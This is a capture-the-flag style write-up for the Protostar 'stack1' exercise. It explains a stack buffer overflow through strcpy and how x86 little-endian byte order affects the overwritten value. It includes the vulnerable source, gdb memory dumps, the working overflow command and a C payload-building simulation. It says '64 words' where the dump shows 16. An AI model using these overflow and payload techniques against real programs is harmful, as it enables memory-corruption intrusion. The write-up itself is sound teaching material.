Sunday, December 9, 2012

exploit-exercises Protostar: Stack 1

This is the write-up for the stack1 challenge of Exploit-Exercises' Protostar wargame. The source code is provided as follows:
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>
#include <err.h>   /* errx(); missing from the original listing, which only compiles with a warning */

int main(int argc, char **argv)
{
volatile int modified;   /* sits at a higher address than buffer on the stack */
char buffer[64];

if(argc == 1) {
errx(1, "please specify an argument\n");
}

modified = 0;
strcpy(buffer, argv[1]);   /* no length check: argv[1] longer than 64 bytes overwrites modified */

if(modified == 0x61626364) {
printf("you have correctly got the variable to the right value\n");
} else {
printf("Try again, you got 0x%08x\n", modified);
}
}
Like the previous challenge, the task is to change the value of the modified
variable. But this time, we have to set it to a specific value: 0x61626364.
Looking at the ASCII table, you will see that these bytes are printable characters:
0x61 => a, 0x62 => b, 0x63 => c, 0x64 => d
user@protostar:~/stack1$ gdb -q /opt/protostar/bin/stack1
Reading symbols from /opt/protostar/bin/stack1...done. 
(gdb) run `python -c "print 'A'*64+'abcd'"`
Starting program: /opt/protostar/bin/stack1 `python -c "print 'A'*64+'abcd'"`
Try again, you got 0x64636261

Program exited with code 036.
One small catch is that 'abcd' is read back as 0x64636261, i.e. 'dcba'. Why is that? Simply
because we are writing raw bytes into memory, and x86 is little endian: a 4-byte int is
stored least-significant byte first. strcpy writes 'a' (0x61) to the lowest address of
modified, which the CPU treats as the least significant byte, so the bytes end up reversed
when the value is read as an integer. Let's confirm that in memory:
(gdb) break 18
Breakpoint 1 at 0x80484a7: file stack1/stack1.c, line 18.
(gdb) run `python -c "print 'A'*64+'abcd'"`
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /opt/protostar/bin/stack1 `python -c "print 'A'*64+'abcd'"`

Breakpoint 1, main (argc=2, argv=0xbffff814) at stack1/stack1.c:18
18    in stack1/stack1.c
(gdb) x/30wx $esp
0xbffff700:    0xbffff71c        0xbffff94e        0xb7fff8f8       0xb7f0186e
0xbffff710:    0xb7fd7ff4       0xb7ec6165    0xbffff728        0x41414141
0xbffff720:    0x41414141    0x41414141    0x41414141    0x41414141
0xbffff730:    0x41414141    0x41414141    0x41414141    0x41414141
0xbffff740:    0x41414141    0x41414141    0x41414141    0x41414141
0xbffff750:    0x41414141    0x41414141    0x41414141    0x64636261
0xbffff760:    0x08048400    0x00000000    0xbffff7e8        0xb7eadc76
0xbffff770:    0x00000002    0xbffff814 
The 64 words of 0x41414141 are the buffer, and the word right after it (0xbffff75c) is modified, holding 0x64636261. So in order to exploit this challenge we write the bytes in reverse order, 'dcba', so that they are read back as 0x61626364.
user@protostar:~$ /opt/protostar/bin/stack1 `python -c "print 'A'*64+'dcba'"`
you have correctly got the variable to the right value
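To make the byte-ordering point concrete, here is a small C program that I am adding to this write-up (it is not part of the Protostar sources). It models the stack1 frame as a struct with the 64-byte buffer followed by modified, just as gdb showed them laid out, encodes a target value in little-endian order, replays the overflow with memcpy, and checks the one thing that would break this exploit: a target value containing a NUL byte, which strcpy would never copy. The struct, the function names and the 'A' filler are my own assumptions for the simulation; the 64/4 byte sizes are the program's.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Assumed model of stack1's frame, matching the gdb dump: 64 bytes of buffer
 * immediately followed at the higher address by the 4-byte 'modified'. */
struct frame {
    char buffer[64];
    uint32_t modified;
};

/* Encode a 32-bit value the way a little-endian CPU stores it: least
 * significant byte at the lowest address. 0x61626364 becomes 64 63 62 61 ("dcba"). */
void le32_bytes(uint32_t v, unsigned char out[4])
{
    out[0] = (unsigned char)(v & 0xff);
    out[1] = (unsigned char)((v >> 8) & 0xff);
    out[2] = (unsigned char)((v >> 16) & 0xff);
    out[3] = (unsigned char)((v >> 24) & 0xff);
}

/* strcpy() stops at the first NUL, so a target containing a zero byte cannot
 * be delivered through argv[1]. Returns 1 if every byte is non-zero. */
int target_is_copyable(uint32_t target)
{
    unsigned char b[4];
    le32_bytes(target, b);
    for (int i = 0; i < 4; i++)
        if (b[i] == 0) return 0;
    return 1;
}

/* Build the payload: 64 filler bytes, then the target in little-endian order.
 * Returns the payload length (68) or 0 if the target is not deliverable. */
size_t build_payload(uint32_t target, unsigned char *out, size_t cap)
{
    if (cap < 68 || !target_is_copyable(target)) return 0;
    memset(out, 'A', 64);
    le32_bytes(target, out + 64);
    return 68;
}

/* Replay the bug: copy the payload straight over the frame, which is what
 * strcpy(buffer, argv[1]) does when argv[1] is longer than 64 bytes. */
uint32_t simulate_overflow(const unsigned char *payload, size_t len)
{
    struct frame f;
    f.modified = 0;
    if (len > sizeof f) len = sizeof f;   /* keep the simulation inside the struct */
    memcpy(&f, payload, len);
    return f.modified;
}

/* The write-up's style of attempt: 64 'A's followed by four literal characters.
 * The result depends on host byte order; on x86 "abcd" yields 0x64636261. */
uint32_t overflow_with_suffix(const char *four_chars)
{
    unsigned char p[68];
    memset(p, 'A', 64);
    memcpy(p + 64, four_chars, 4);
    return simulate_overflow(p, sizeof p);
}

/* Full exploit path: encode the target properly and replay the overflow.
 * Returns the value 'modified' ends up with, or 0 if the target can't be copied. */
uint32_t exploit_result(uint32_t target)
{
    unsigned char p[68];
    if (build_payload(target, p, sizeof p) == 0) return 0;
    return simulate_overflow(p, sizeof p);
}

int main(void)
{
    /* Constructed inputs: the first, wrong attempt and the working one. */
    printf("'abcd' gives modified = 0x%08x\n", overflow_with_suffix("abcd"));
    printf("'dcba' gives modified = 0x%08x\n", overflow_with_suffix("dcba"));
    printf("encoded 0x61626364 gives modified = 0x%08x\n", exploit_result(0x61626364u));
    printf("0x61620064 deliverable via strcpy? %d\n", target_is_copyable(0x61620064u));
    return 0;
}
```

The same idea is what `python -c "print 'A'*64+'dcba'"` does by hand; for targets that are not printable ASCII you would use struct.pack("<I", value) instead of typing the characters, and the NUL check above is the reason a value like 0x61620064 could not be delivered through strcpy at all.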
